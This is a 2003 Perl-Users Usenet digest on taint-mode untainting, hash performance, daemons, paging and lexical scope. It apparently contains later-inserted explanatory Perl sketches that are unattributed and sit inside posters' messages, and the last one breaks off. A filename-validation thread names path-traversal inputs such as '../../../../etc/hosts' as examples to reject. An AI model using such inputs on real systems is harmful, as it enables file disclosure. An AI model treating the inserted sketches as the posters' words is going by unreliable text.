[22329] in Perl-Users-Digest


Perl-Users Digest, Issue: 4550 Volume: 10

daemon@ATHENA.MIT.EDU (Perl-Users Digest)
Tue Feb 11 14:06:20 2003

Date: Tue, 11 Feb 2003 11:05:09 -0800 (PST)
From: Perl-Users Digest <Perl-Users-Request@ruby.OCE.ORST.EDU>
To: Perl-Users@ruby.OCE.ORST.EDU (Perl-Users Digest)

Perl-Users Digest           Tue, 11 Feb 2003     Volume: 10 Number: 4550

Today's topics:
        **URGENT** Finding the number of open file descriptors  (amar)
    Re: **URGENT** Finding the number of open file descript (Walter Roberson)
    Re: **URGENT** Finding the number of open file descript <wichmann@uni-wuppertal.de>
    Re: [Regex] Removing lines not containing a substring <goldbb2@earthlink.net>
    Re: ActivePerl, upgraded then downgraded, problems! (Randy Kobes)
    Re: building hash <goldbb2@earthlink.net>
    Re: building hash <bigj@kamelfreund.de>
    Re: building hash ctcgag@hotmail.com
        createing a daemon <ryan@dctnet.net>
    Re: createing a daemon <hekmanATgeo-slopeDOTcom@no.spam>
        DBD::mysql not loading mysql.dll (Allen)
    Re: Does anyone know if ... <tore@aursand.no>
        extracting JS links with Perl (Walter Pienciak)
    Re: Insecure Filehandle Dependencies <j.j.konkle-parker@larc.nasa.gov>
    Re: Insecure Filehandle Dependencies <j.j.konkle-parker@larc.nasa.gov>
    Re: Insecure Filehandle Dependencies <j.j.konkle-parker@larc.nasa.gov>
    Re: Insecure Filehandle Dependencies <bigj@kamelfreund.de>
    Re: Insecure Filehandle Dependencies (Walter Roberson)
    Re: iterator in for loop (squillion)
    Re: newbie date comparison <pvaratha@ford.com>
    Re: Paging output <goldbb2@earthlink.net>
    Re: RegEx Questions <mememe@meme.com>
    Re: Scope of a global lexical <goldbb2@earthlink.net>
        Security bug in CGI::Lite::escape_dangerous_chars() fun (Ronald F. Guilmette)
    Re: Storing `ls -R` into an array (William English)
        trailing conditional - apparently inconsistent syntax r (squillion)
        XML parsing and array-context problem (Jesse Sheidlower)
    Re: XML parsing and array-context problem <goldbb2@earthlink.net>
    Re: XML parsing and array-context problem (Jesse Sheidlower)
    Re: XML parsing and array-context problem (Anno Siegel)
    Re: XML parsing and array-context problem <goldbb2@earthlink.net>
        Digest Administrivia (Last modified: 6 Apr 01) (Perl-Users-Digest Admin)

----------------------------------------------------------------------

Date: 11 Feb 2003 08:19:24 -0800
From: amarsantpur@hotmail.com (amar)
Subject: **URGENT** Finding the number of open file descriptors using perl
Message-Id: <51db1bd3.0302110819.76698483@posting.google.com>

Hello,

  I just want to find the number of file descriptors/handles which are open
at a particular instant when a perl program is getting executed.  If i can
print out those file handles that will be great.

  Can anyone help me out in this??  An early reply is appreciated bcoz. i got
stuck in debugging my code.

Thanks & Regards,
Amar.


------------------------------

Date: 11 Feb 2003 16:29:26 GMT
From: roberson@ibd.nrc-cnrc.gc.ca (Walter Roberson)
Subject: Re: **URGENT** Finding the number of open file descriptors using perl
Message-Id: <b2b8d6$dl8$1@canopus.cc.umanitoba.ca>

In article <51db1bd3.0302110819.76698483@posting.google.com>,
amar <amarsantpur@hotmail.com> wrote:
:  I just want to find the number of file descriptors/handles which are open
:at a particular instant when a perl program is getting executed.  If i can
:print out those file handles that will be great.

:  Can anyone help me out in this??  An early reply is appreciated bcoz. i got
:stuck in debugging my code.

If you are on a POSIX-compliant box, you can call
sysconf(_SC_OPEN_MAX), which returns the "Maximum number
of files that one process can have open at a given time." Typical
values are 100, 250, or 255.

Once you know the maximum number of open files, you can iterate
over the descriptor numbers, testing each fd in turn, for example by
calling the system read function on the fd number and
checking the return value to find out whether the
fd was open at all.

Unfortunately, the technique I outline is not able to make a connection
between FILEHANDLE and fd, so it would be useful only for testing
to find out how many handles you had open.
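
A minimal sketch of the probing approach described above, assuming a POSIX
system and Perl's standard POSIX module. Instead of read(), it probes each
descriptor with POSIX::fstat, which does not consume any input. The helper
name open_fds and the cap of 4096 descriptors are illustrative assumptions,
not part of the original suggestion.

```perl
use strict;
use warnings;
use POSIX ();

# Return the numbers of all file descriptors that are currently open.
# open_fds() is a hypothetical helper name.
sub open_fds {
    my $max = POSIX::sysconf(POSIX::_SC_OPEN_MAX());
    # Assumed fallback and cap: some systems report no limit or a huge one.
    $max = 256  if !defined $max || $max <= 0;
    $max = 4096 if $max > 4096;

    my @open;
    for my $fd (0 .. $max - 1) {
        # fstat returns an empty list for a descriptor that is not open.
        my @st = POSIX::fstat($fd);
        push @open, $fd if @st;
    }
    return @open;
}

my @fds = open_fds();
print scalar(@fds), " descriptors open: @fds\n";
```

As the post says, this only yields descriptor numbers; it does not map them
back to Perl filehandle names.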


There's probably a better way, and there would certainly be a way
involving poking around in perl's internals.


I'm having a bit of difficulty in picturing at the moment how your
debugging will benefit from knowing how -many- handles you have open??
-- 
Contents: 100% recycled post-consumer statements.


------------------------------

Date: Tue, 11 Feb 2003 17:22:24 +0100
From: Ingo Wichmann <wichmann@uni-wuppertal.de>
Subject: Re: **URGENT** Finding the number of open file descriptors using perl
Message-Id: <b2b88f$thc$03$1@news.t-online.com>

amar schrieb:
>   I just want to find the number of file descriptors/handles which are open
> at a particular instant when a perl program is getting executed.  If i can
> print out those file handles that will be great.

lsof is a unix-command for that purpose.

there is a windows tool too, but i forgot the name. search for "find 
open files windows" on google.

Ingo

PS: The word **URGENT** is one of the first to filter by a spamfilter



------------------------------

Date: Tue, 11 Feb 2003 12:43:51 -0500
From: Benjamin Goldberg <goldbb2@earthlink.net>
Subject: Re: [Regex] Removing lines not containing a substring
Message-Id: <3E493657.B954E55@earthlink.net>

Allan Cady wrote:
[snip]
>    # Load data
>    read(DATA, $data, 65536);

It's more idiomatic to do:

   read(DATA, $data, -s DATA);

Which ensures that you really do have the whole thing.

Or to be even more idiomatic, do:

   $data = do { local $/; <DATA> };

[snip]

Naah, that code does too much work.

Try this:

   print $1 while $data =~ /^\s*(<td.*)/mgi;
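
A small self-contained sketch of the two idioms above (slurping with a
localized $/ and collecting matches with /mg). The sample HTML and the
helper name td_lines are made up for illustration, and an in-memory
filehandle stands in for DATA.

```perl
use strict;
use warnings;

# Return every line of $data that starts (after optional whitespace)
# with a <td tag, matched case-insensitively.
sub td_lines {
    my ($data) = @_;
    my @hits;
    push @hits, $1 while $data =~ /^\s*(<td.*)/mgi;
    return @hits;
}

# Slurp a whole filehandle in one read by locally undefining $/.
my $html = "<tr>\n  <TD>one</td>\nplain text\n<td>two\n";
open(my $in, '<', \$html) or die "Can't open in-memory file: $!";
my $data = do { local $/; <$in> };
close($in);

# The capture does not include the newline, so add one when printing.
print "$_\n" for td_lines($data);
```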

-- 
"So, who beat the clueless idiot today?"
"Well, we flipped for it, but when Kuno
 landed, he wasn't in any shape to fight."
"Next time, try flipping a *coin.*"


------------------------------

Date: 11 Feb 2003 16:47:36 GMT
From: randy@theoryx5.uwinnipeg.ca (Randy Kobes)
Subject: Re: ActivePerl, upgraded then downgraded, problems!
Message-Id: <slrnb4i9sh.nq6.randy@theoryx5.uwinnipeg.ca>

On Tue, 11 Feb 2003 07:38:14 GMT, 
   Philip Lees <pjlees@ics.forthcomingevents.gr> wrote:
>On 10 Feb 2003 15:24:50 GMT, randy@theoryx5.uwinnipeg.ca (Randy Kobes)
>wrote:
[ .. ]
>>The message about "not intended for this build ..." means
>>that ppm found a ppd file whose name matched what you were
>>after, but the ARCHITECTURE tag in the ppd file didn't
>>correspond to your system. 
>
>Checking again I see that Apache::Session mentions only Linux, but 
>the CGI::Session page gives the following spec:
>
>PPM Platforms: Linux Solaris Windows  
>Version: CGI-Session 0.01  
>Perl Version: 5.6 
>
>http://aspn.activestate.com/ASPN/Modules/dist_html?dist_id=11032

I think that's a mistake - the CGI-Session.zip package from
http://ppm.activestate.com/PPMPackages/zips/6xx-builds-only/
only contains a 'i686-linux-thread-multi' build.

-- 
best regards,
randy kobes


------------------------------

Date: Tue, 11 Feb 2003 12:26:12 -0500
From: Benjamin Goldberg <goldbb2@earthlink.net>
Subject: Re: building hash
Message-Id: <3E493234.D34CCB4B@earthlink.net>

joeri wrote:
> 
> Hi,
> 
> I have a 75 MB file consisting of lines that look like:
> 
> S0973708    Other operation on meninges OS
> S0873517    Excision of lesion of brain meninges
> S0873177    Excision brain meninges lesion
> S1295875    Removal of lesion of brain meninge
> 
> The first element on each line is some sort of ID, followed by a tab,
> followed by some string.
> I want to load these into a hash like so, assuming that IN is the
> filehandle associated with the above file:
> 
> while(<IN>) {
>     $string{$1}={$2} if $_ =~ /(.*)\t(.*)\n/;
> }
>
> This goes pretty fast at the start, but really slows down as the hash
> grows bigger.

As others have said, that's most likely due to the amount of memory that
the hash is taking up.  Try changing it to:

while(<IN>) {
    $string{$1} = $2 if $_ =~ /(.*?)\t(.*)/;
}

And I expect that it will go faster.

If you know the format of the ID strings, you can probably get the hash
keys to take up less memory.  For example, if the ID string is *always*
a letter followed by 9 digits, then you can do:

while(<IN>) {
   $string{$1 . pack('N', $2)} = $3 if /(.)(.*?)\t(.*)/;
}

This produces 5 byte keys, instead of 10 byte keys... *if* this reduces
the amount of memory allocated per key (it should, I think, but might
not, depending on the vagaries of malloc()), then it will result in
less memory allocated overall, and thus run faster.
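
A hedged sketch of the key-packing idea, written as a round trip so the
original ID can be recovered. The helper names pack_id and unpack_id are
hypothetical, and the default width of 7 digits is an assumption taken from
the sample lines; pack 'N' stores an unsigned 32-bit value, so the numeric
part must stay below 4294967296.

```perl
use strict;
use warnings;

# Pack an ID such as "S0973708" (one letter plus digits) into a 5-byte key:
# the letter, then the number as a 32-bit big-endian integer.
sub pack_id {
    my ($id) = @_;
    my ($letter, $digits) = $id =~ /\A(.)(\d+)\z/
        or die "Unexpected ID format: $id";
    return $letter . pack('N', $digits);
}

# Reverse the packing. Leading zeros are lost by pack, so they are
# restored here by padding to an assumed fixed width.
sub unpack_id {
    my ($key, $width) = @_;
    $width = 7 unless defined $width;
    my ($letter, $num) = unpack('a1 N', $key);
    return sprintf('%s%0*d', $letter, $width, $num);
}

my $key = pack_id('S0973708');
print length($key), " bytes, restores to ", unpack_id($key), "\n";
```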

> This is probably due to the fact that while assigning a
> value to a key, Perl checks to see if the key already
> exists. The question here is, if I'm sure that the keys I will be
> using for the hash are unique, so that there is no need to check if
> the key already exists, can I build a hash or something similar for
> quick lookup later more rapidly?

You *always* need to check if the key already exists, *but* this takes
just about zero time, since it's done at the C level, with a single
instruction, just before the actual insertion takes place.

Really the biggest cost is time for allocating memory.

If you were to tell perl to pre-allocate memory for the hash, before you
go inserting data, you'll get a significant speedup.

Assuming 64 bytes/line, pre-allocate using:

   keys(%string) = (-s IN) / 64;

Or, to dynamically guess the number of lines in the file:

my $size = -s IN;
keys(%string) = $size / 64;
while(<IN>) {
    keys(%string) = ( $. / tell(IN) ) * $size
       unless $. & 0xfff;
    $string{$1} = $2 if $_ =~ /(.*?)\t(.*)/;
}

This says, every 4096 lines, make a guess as to how many lines there are
per byte, and multiply that by how many bytes there are in the file, and
that's how many lines there probably are.
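
A minimal sketch of the pre-allocation idea with a lexical filehandle. The
function name load_table, the in-memory sample data, and the 64 bytes/line
estimate are assumptions for illustration; whether pre-sizing gives a
measurable speedup depends on the Perl version and the data.

```perl
use strict;
use warnings;

# Load tab-separated "ID<TAB>text" lines from a filehandle into a hash,
# pre-sizing the hash from an estimated line count.
sub load_table {
    my ($fh, $expected_lines) = @_;
    my %string;
    # Assigning to keys() asks perl to allocate at least that many buckets.
    keys(%string) = $expected_lines if $expected_lines > 0;
    while (my $line = <$fh>) {
        $string{$1} = $2 if $line =~ /^(.*?)\t(.*)/;
    }
    return \%string;
}

my $sample = "S0973708\tOther operation on meninges OS\n"
           . "S0873517\tExcision of lesion of brain meninges\n";
open(my $in, '<', \$sample) or die "Can't open in-memory file: $!";
my $table = load_table($in, int(length($sample) / 64) + 1);
close($in);
print "$_ => $table->{$_}\n" for sort keys %$table;
```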

-- 
"So, who beat the clueless idiot today?"
"Well, we flipped for it, but when Kuno
 landed, he wasn't in any shape to fight."
"Next time, try flipping a *coin.*"


------------------------------

Date: Tue, 11 Feb 2003 16:49:17 +0100
From: "Janek Schleicher" <bigj@kamelfreund.de>
Subject: Re: building hash
Message-Id: <pan.2003.02.11.15.21.56.544093@kamelfreund.de>

On Tue, 11 Feb 2003 13:37:01 +0000, Tassilo v. Parseval wrote:

> Also sprach Janek Schleicher:
> 
>> ...
> 
> The thread reminds me of an idea I had been mind-toying with lately.
> Writing a module (with a tie() interface) that makes all Perl data-types
> store the data zlib-compressed. It could be done in XS to gain some
> speed but it's probably less trivial than it sounds since on an
> ordinary FETCH the data would need to be decompressed and could thusly
> explode your memory.

Great idea!

Perhaps you don't need to compress everything. I would suggest compressing
block by block, with each compressed block assigned to some hash keys (or
% a number). With chunks of perhaps 1024 bytes, the compression
would not be perfect, but it would still reduce the size by more than 50%
(assuming large textual data). Then you would only need a normal hash or
similar to remember which blocks are assigned to which hash keys.

I'm afraid my explanation is confusing. But the main idea is simply to
compress not everything together, but in separate blocks that can be
distinguished by e.g. the hash value. That would also have the advantage
that it could be used efficiently in RAM as well as on disk.


Looking forward to such a module,
Greetings,
Janek


------------------------------

Date: 11 Feb 2003 17:24:01 GMT
From: ctcgag@hotmail.com
Subject: Re: building hash
Message-Id: <20030211122401.239$GM@newsreader.com>

"joeri" <jvandervloet@hotmail.com> wrote:
> Hi,
>
> I have a 75 MB file consisting of lines that look like:
>
> S0973708    Other operation on meninges OS
> S0873517    Excision of lesion of brain meninges
> S0873177    Excision brain meninges lesion
> S1295875    Removal of lesion of brain meninge
 ...
> This goes pretty fast at the start, but really slows down as the hash
> grows bigger.


I'm estimating your lines are 40 bytes long, so that's
~2M rows.  Each one goes into a hash with 8 byte key, ~30 byte
value.  I get about 140 bytes memory usage per pair on
simulated data, so that's about 280 Meg total.  I don't know what
other programs you have running, or what other data you have in this
program, but you might be swapping.  Do you hear the hard drive thrashing?
Check with 'top' or 'ps' (unix) or whatever (non-unix) to see what the
process sizes are.

Is there some kind of check-sum built into that key?  If so, it can really
screw up the hashing, especially in older versions.  (I've been burned by
that in 5.005.03).  Load half the file (or however long you are willing to
wait) then print the hash in scalar context and the keys in scalar context
to see how many buckets are being used.  If you have 1_000_000 keys but the
bucket usage is 4/8, then that's the problem.  (I happened to fix this
problem by preassigning buckets, keys %hash=500_000, but that won't always
work)


> This is probably due to the fact that while assigning a value to a key,
> Perl checks to see if the key already
> exists.

Unless your hash is degenerating badly, this checking is extremely
fast.

> The question here is, if I'm sure that the keys I will be using
> for the hash are unique, so that there
> is no need to check if the key already exists, can I build a hash or
> something similar for quick
> lookup later more rapidly?

No.  Unless your hashing is degenerate, the check is trivially fast.
If the hashing is degenerate, then it could be theoretically possible
to speed up considerably by not checking (if perl uses an unordered
list in each bucket), but I don't think perl provides a way to do that.
And even if you could, look-ups in that hash would still be slow.


Xho

-- 
-------------------- http://NewsReader.Com/ --------------------
Usenet Newsgroup Service              New Rate! $9.95/Month 50GB


------------------------------

Date: Tue, 11 Feb 2003 13:19:10 -0500
From: ryan <ryan@dctnet.net>
Subject: createing a daemon
Message-Id: <pan.2003.02.11.13.19.09.119902.20427@dctnet.net>

Hi, 
	I was wondering if anyone can point me to some information about
creating a daemon with perl.  I want it to run from the init.d and be
able to use the start|stop|restart options.  It will just process a
queue file, so it won't be all that complex. Any help would be greatly
appreciated.  I don't really want to have it run as a cron job, as it
will not be as robust as I would like it to be.  Thanks again.

Ryan


------------------------------

Date: Tue, 11 Feb 2003 11:43:20 -0700
From: "Nathaniel Hekman" <hekmanATgeo-slopeDOTcom@no.spam>
Subject: Re: createing a daemon
Message-Id: <%vb2a.912$xa.220505@localhost>

http://www.webreference.com/perl/tutorial/9/ talks about how to run a
process as a daemon, though it doesn't address using init.d.  Half the
battle anyway...
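
For reference, a hedged sketch of the usual fork/setsid sequence for
detaching a Perl process, using the standard POSIX module. It is not taken
from the linked tutorial. The helper names, the PID-file path, and the
worker loop in the comments are hypothetical, and the init.d wrapper that
would call start|stop|restart is not shown.

```perl
use strict;
use warnings;
use POSIX qw(setsid);

# Detach the current process from its terminal and parent.
sub daemonize {
    chdir '/' or die "Can't chdir to /: $!";
    open(STDIN,  '<', '/dev/null') or die "Can't read /dev/null: $!";
    open(STDOUT, '>', '/dev/null') or die "Can't write to /dev/null: $!";
    defined(my $pid = fork()) or die "Can't fork: $!";
    exit 0 if $pid;    # the parent exits; the child carries on
    my $sid = setsid();
    die "Can't start a new session: $!" if !defined $sid || $sid == -1;
    open(STDERR, '>&', \*STDOUT) or die "Can't dup STDOUT: $!";
    return $$;
}

# Record the daemon's PID so a "stop" action can signal it later.
sub write_pidfile {
    my ($path, $pid) = @_;
    open(my $fh, '>', $path) or die "Can't write $path: $!";
    print {$fh} "$pid\n";
    close($fh) or die "Can't close $path: $!";
}

# Typical use (not run here, since it would detach this script):
#   my $pid = daemonize();
#   write_pidfile('/var/run/queue-worker.pid', $pid);   # hypothetical path
#   while (1) { process_queue(); sleep 5 }              # hypothetical worker
```

A "stop" action can then read the PID file and send the process a TERM
signal with kill.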


Nate

"ryan" <ryan@dctnet.net> wrote in message
news:pan.2003.02.11.13.19.09.119902.20427@dctnet.net...
> Hi,
> I was wondering if anyone can point me to some information about
> creating a daemon with perl.  I want it to run from the init.d and be
> able to use the start|stop|restart options.  It will just process a
> queue file, so it won't be all that complex. Any help would be greatly
> appreciated.  I don't really want to have it run as a cron job, as it
> will not be as robust as I would like it to be.  Thanks again.
>
> Ryan




------------------------------

Date: 11 Feb 2003 09:23:17 -0800
From: umayxa3@yahoo.com (Allen)
Subject: DBD::mysql not loading mysql.dll
Message-Id: <dc2b29ad.0302110923.77618a55@posting.google.com>

On a Microsoft box, I've got ActivePerl installed and I've installed
DBD::mysql through >ppm.
I installed DBD::mysql through this command:
ppm> install http://theoryx5.uwinnipeg.ca/ppms/DBD-mysql.ppd

Now I am getting the error below. 
Can someone point me in a direction on how to have the server
recognize this DLL? What's the problem with this?

Thanks for any help.

-Allen


CGI Error
The specified CGI application misbehaved by not returning a complete
set of HTTP headers. The headers it did return are:

-----
Can't load 'C:/Perl/site/lib/auto/DBD/mysql/mysql.dll' for module
DBD::mysql: load_file:The specified procedure could not be found at
C:/Perl/lib/DynaLoader.pm line 229.
 at C:\mysite\cgi-bin\getprice.cgi line 13
Compilation failed in require at C:\mysite\cgi-bin\getprice.cgi line
13.
BEGIN failed--compilation aborted at C:\mysite\cgi-bin\getprice.cgi
line 13.

---
Line 12 and 13 of the CGI:
use DBI;
use DBD::mysql;


------------------------------

Date: Tue, 11 Feb 2003 17:40:38 +0100
From: "Tore Aursand" <tore@aursand.no>
Subject: Re: Does anyone know if ...
Message-Id: <pan.2003.02.11.16.40.38.487282@aursand.no>

On Tue, 11 Feb 2003 15:16:14 +0000, Basil Skordinski wrote:
> Does anyone know if there are any Perl modules out there somewhere
> that could make it possible and easy to program a desired interaction
> with a remote web site?

These modules should help you out:

  o WWW::Mechanize
  o LWP::UserAgent

You'll find them on http://www.cpan.org/


--
Tore Aursand - tore@aursand.no - http://www.aursand.no/


------------------------------

Date: 11 Feb 2003 17:50:31 GMT
From: walter@io.frii.com (Walter Pienciak)
Subject: extracting JS links with Perl
Message-Id: <3e4937e7$0$17990$75868355@news.frii.net>

Hi,

More and more I see HTML developers using embedded javascript to
"link to" other files.

My Perl-based upload mechanisms check that links actually work,
but this JS stuff increasingly seems to be cut-and-paste jobs with
a corresponding increase in "broken crap" being included.

Right now, I'm dealing with it via brute-force methods -- regexps
tuned to functions in specific .js files, where I eyeballed the
link code -- but this is like fighting the tide, and doesn't scale.

Is anyone else dealing with this problem effectively?  How?
(Forbidding JS is just not an option for me, sorry.)

Walter


------------------------------

Date: Tue, 11 Feb 2003 11:16:44 -0500
From: Joel Konkle-Parker <j.j.konkle-parker@larc.nasa.gov>
Subject: Re: Insecure Filehandle Dependencies
Message-Id: <3E4921EC.5070507@larc.nasa.gov>

> OK, it _has_ been encapsulated here in some code which, in fact,
> renders it safe, but wouldn't it be better general advice to untaint
> $filename with an appropriate regexp?  (a slight re-casting of the
> other statements seems to be all that it needs).
> 
> IMHO and YMMV, cheers
> 


What would the appropriate regexp be?



------------------------------

Date: Tue, 11 Feb 2003 11:21:08 -0500
From: Joel Konkle-Parker <j.j.konkle-parker@larc.nasa.gov>
Subject: Re: Insecure Filehandle Dependencies
Message-Id: <3E4922F4.4030404@larc.nasa.gov>

> This is a sanity check but it is not yet proper untainting of the data.
> Currently you make sure that $filename won't contain any characters other
> than alphanumericals and _. You have to apply a capturing pattern-match
> to untaint the data:
> 
>     if ($rawfilename !~ /\W/) {
>         ($filename) = $rawfilename =~ /(.*)/;
>     }
> 
> $filename is now an exact copy of $rawfilename but it is no longer
> tainted so you can eventually use it as an argument to open():
> 
> 
>>open (TRAIL, ">$filename.txt") || die $!."\n";
>>
> 
> Tassilo
> 

I've included my code snippet below. The -T switch is still complaining 
about insecure dependencies on that line.

if ($rawfilename !~ /\W/) {
   ($filename) = $rawfilename =~ /(.*)/; #this line
}



------------------------------

Date: Tue, 11 Feb 2003 11:21:41 -0500
From: Joel Konkle-Parker <j.j.konkle-parker@larc.nasa.gov>
Subject: Re: Insecure Filehandle Dependencies
Message-Id: <3E492315.7060307@larc.nasa.gov>

If it matters, this is Perl 5.004



------------------------------

Date: Tue, 11 Feb 2003 16:07:57 +0100
From: "Janek Schleicher" <bigj@kamelfreund.de>
Subject: Re: Insecure Filehandle Dependencies
Message-Id: <pan.2003.02.11.15.07.55.625104@kamelfreund.de>

On Tue, 11 Feb 2003 11:16:44 -0500, Joel Konkle-Parker wrote:

>> OK, it _has_ been encapsulated here in some code which, in fact,
>> renders it safe, but wouldn't it be better general advice to untaint
>> $filename with an appropriate regexp?  (a slight re-casting of the
>> other statements seems to be all that it needs).
>> 
>> IMHO and YMMV, cheers
>> 
> 
> 
> What would the appropriate regexp be?

I would propose

/\w+(.\w+)*/

That would allow normal filenames like
filename.txt, archive.tar.gz
but disallow dangerous ones like
/etc/passwd or ../../../../etc/hosts

The exact definition depends on which files the user should be allowed
to get access to.


Greetings,
Janek


------------------------------

Date: 11 Feb 2003 17:23:37 GMT
From: roberson@ibd.nrc-cnrc.gc.ca (Walter Roberson)
Subject: Re: Insecure Filehandle Dependencies
Message-Id: <b2bbip$f4o$1@canopus.cc.umanitoba.ca>

In article <pan.2003.02.11.15.07.55.625104@kamelfreund.de>,
Janek Schleicher <bigj@kamelfreund.de> wrote:
:I would propose

:/\w+(.\w+)*/

:That would allow normal filenames like
:filename.txt, archive.tar.gz
:but disallow dangerous ones like
:/etc/passwd or ../../../../etc/hosts

I suspect you wanted to quote the '.', not to allow it to stand
for "any one character". You probably didn't want to allow matches
against  foo/bar$baz
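
A minimal sketch of the corrected pattern, assuming the goal is to accept
only plain names such as filename.txt. The dot is escaped, the match is
anchored at both ends, and the capture is what untaints the value under -T.
The helper name untaint_filename is hypothetical.

```perl
use strict;
use warnings;

# Return an untainted copy of $raw if it looks like a plain file name
# (word characters, optionally separated by single literal dots),
# or undef otherwise.
sub untaint_filename {
    my ($raw) = @_;
    return $raw =~ /\A(\w+(?:\.\w+)*)\z/ ? $1 : undef;
}

for my $name ('archive.tar.gz', '/etc/passwd', 'foo/bar$baz') {
    my $clean = untaint_filename($name);
    print "$name: ", (defined $clean ? "accepted" : "rejected"), "\n";
}
```

Without the \A and \z anchors the pattern would match a safe-looking
substring of an unsafe name, so the anchors matter as much as the escaped
dot.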
-- 
This is not the same .sig the second time you read it.


------------------------------

Date: 11 Feb 2003 10:44:29 -0800
From: squillion@hotmail.com (squillion)
Subject: Re: iterator in for loop
Message-Id: <81016f2d.0302111044.6208ec8@posting.google.com>

many thanks for all responses, much appreciated!


------------------------------

Date: Tue, 11 Feb 2003 11:51:38 -0500
From: "Pathman" <pvaratha@ford.com>
Subject: Re: newbie date comparison
Message-Id: <b2b9mr$fs12@eccws12.dearborn.ford.com>

You may have to install the Time::ParseDate module from CPAN and
use it in your script.

When you use parsedate($curtime) - parsedate($crdate), it should give the
difference in seconds. You should keep a standard date format for $curtime
and $crdate.
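
As an alternative to parsing date strings, here is a hedged sketch that
compares epoch seconds directly, since both time() and stat() already
return them. This is a different technique from the Time::ParseDate
suggestion above. It uses the modification time (element 9 of stat) where
the question uses element 10, and it only lists files instead of deleting
them. The helper name older_than_days is hypothetical.

```perl
use strict;
use warnings;

# True if $file was last modified more than $days days before $now.
# $now defaults to the current time; both are epoch seconds.
sub older_than_days {
    my ($file, $days, $now) = @_;
    $now = time unless defined $now;
    my $mtime = (stat $file)[9];
    die "Can't stat $file: $!" unless defined $mtime;
    return ($now - $mtime) > $days * 24 * 60 * 60;
}

# Usage: list (rather than delete) *.log files older than two days.
# The directory layout follows the question; adjust $basedir as needed.
my $basedir = 'd:/data/perl/tranlogs';
for my $day (qw(Mon Tue Wed Thu Fri Sat Sun)) {
    for my $file (glob("$basedir/$day/*.log")) {
        print "$file\n" if older_than_days($file, 2);
    }
}
```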
"Andy" <post@forum.please> wrote in message
news:b26295$8tk$1@helle.btinternet.com...
> Hi,
> How can I arithmetically compare 2 dates. I am writing a script that needs
> to remove files that are more than 2days old which are stored in directories
> ../Mon ../Tue etc.
> Do I have to load a module ? Below, $curtime is the current system time and
> $crdate is the file inode creation date.
> If $crdate is 2 days older than $curtime then I need to delete the file, but
> I cant work out how to compare them.
>
> $basedir="d:/data/perl/tranlogs";
> @days=qw(Mon Tue Wed Thu Fri Sat Sun);
> $curtime=scalar localtime();
>
> foreach $day (@days) {
>      $skel=${basedir}."/".${day}."/*.log" ;
>      @files=glob($skel);
>      foreach $file (@files) {
>           $crdate=(stat ($file))[10];
>      }
> }
>
> Any help is much appreciated.
> Thanks
> Andy
>
>




------------------------------

Date: Tue, 11 Feb 2003 12:31:38 -0500
From: Benjamin Goldberg <goldbb2@earthlink.net>
Subject: Re: Paging output
Message-Id: <3E49337A.430BED5C@earthlink.net>

Anirban Banerjee wrote:
> 
> How do I do it inside the perl script? I mean everything, even
> <tab><tab> ( I am using ReadLine ) should give me paged output, and
> this should be transparent to the individual functions.

To page perl's output, you can do:

   if( -t STDOUT ) {
      my @pagers = qw(less more pg);
      unshift @pagers, $ENV{PAGER} if exists $ENV{PAGER};
      for my $pager ( @pagers ) {
         open( STDOUT, "|-", $pager ) and last;
      }
      warn "Couldn't page STDOUT: $!" unless -p STDOUT;
   } else {
      # STDOUT is already being redirected to a pager or
      # to a file or to some other program.
   }


-- 
"So, who beat the clueless idiot today?"
"Well, we flipped for it, but when Kuno
 landed, he wasn't in any shape to fight."
"Next time, try flipping a *coin.*"


------------------------------

Date: Tue, 11 Feb 2003 09:54:07 -0700
From: "ColdCathoids" <mememe@meme.com>
Subject: Re: RegEx Questions
Message-Id: <b2b9ri$1a6ftb$1@ID-158028.news.dfncis.de>


"Tore Aursand" <tore@aursand.no> wrote in message
news:pan.2003.02.10.22.29.23.411656@aursand.no...
> On Mon, 10 Feb 2003 10:42:14 -0700, ColdCathoids wrote:
>
> Quick and dirty, but should work. :)
>
>   #!/usr/bin/perl
>   #
>   use strict;
>   use warnings;
>
>   while ( <DATA> ) {
>
>       s/^(.*)\s+on\s+(.*)\s+(\d+\.\d+)\s+(\d+\.\d+)\s+(.*)$/$1,$2,$3,$4,$5/;
>       print;
>   }

Whoo hoo! That's perfect! That does exactly what I want. You have made me
hero of the day!

Now ... any chance you could explain what that line actually does? =)
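
One way to read that line is to spell the same substitution out with the /x
modifier, which allows whitespace and comments inside the pattern. This is
only a sketch: the wrapper name to_csv and the sample input are made up for
illustration.

```perl
use strict;
use warnings;

# Same substitution as in the quoted script, spelled out with /x.
sub to_csv {
    my ($line) = @_;
    $line =~ s{
        ^ (.*)          # group 1: everything before the word "on" (greedy)
        \s+ on \s+      # the literal word "on" surrounded by whitespace
        (.*)            # group 2: everything up to the two numbers
        \s+ (\d+\.\d+)  # group 3: first decimal number
        \s+ (\d+\.\d+)  # group 4: second decimal number
        \s+ (.*) $      # group 5: the rest of the line
    }{$1,$2,$3,$4,$5}x;
    return $line;
}

# Sample input is made up for illustration.
print to_csv("widget on shelf 1.5 2.25 in stock"), "\n";
```

The five captured groups are written back joined by commas, and the
whitespace and the word "on" between them are dropped. Lines that do not
match are left unchanged.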




------------------------------

Date: Tue, 11 Feb 2003 12:37:27 -0500
From: Benjamin Goldberg <goldbb2@earthlink.net>
Subject: Re: Scope of a global lexical
Message-Id: <3E4934D7.5659834E@earthlink.net>

Greg wrote:
> eric wrote:
> > Greg wrote:
> > > use strict;
> > > use warnings;
> > >
> > > smith();
> > >
> > > my $global = 3;
> > >
> > > sub smith{
> > >    print $global || 'undef', "\n";
> > > }
> > >
> > > This prints 'undef' when run in my local Perl 5.6 installation.
> > > How can the body of smith() be interpreted without the assignment
> > > of 3 to $global having taken place?
> >
> > the line
> > my $global = 3;
> > causes $global to be recognized at compile time, and set to 3 at run
> > time.
> > the compile-time recognition means that sub smith can access $global
> > without generating a compile-time error under strict 'vars'.
> > the run-time assignment does not happen until after the call to sub
> > smith, so $global is undefined when sub smith runs.
[snip]
> I see. So, the statement my $global = 3; is executed both at compile
> time and run time. I should have seen this.

Well, part of it is executed at compile time, and part is executed at
run time.

> I'm used to C behavior.

Out of curiosity, when you do, in C:

   static int foo = 3;

Does the '3' get stored in the memory for 'foo' at compile time, or at
_start() time (before main() is called), or somewhere in between?

In other words, if I have a function which is called from _start, will
the 'foo' variable be initialized?
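
On the Perl side, the split between compile time and run time can be shown
with a small sketch that calls the same sub before and after the
assignment. The names report, $early and $late are made up for
illustration; the results are kept in package variables only so they can be
printed at the end.

```perl
use strict;
use warnings;

our ($early, $late);        # package variables, only used to record results

$early = report();          # runs before the assignment below has executed

my $global = 3;             # declared at compile time, assigned at run time

$late = report();           # runs after the assignment

sub report {
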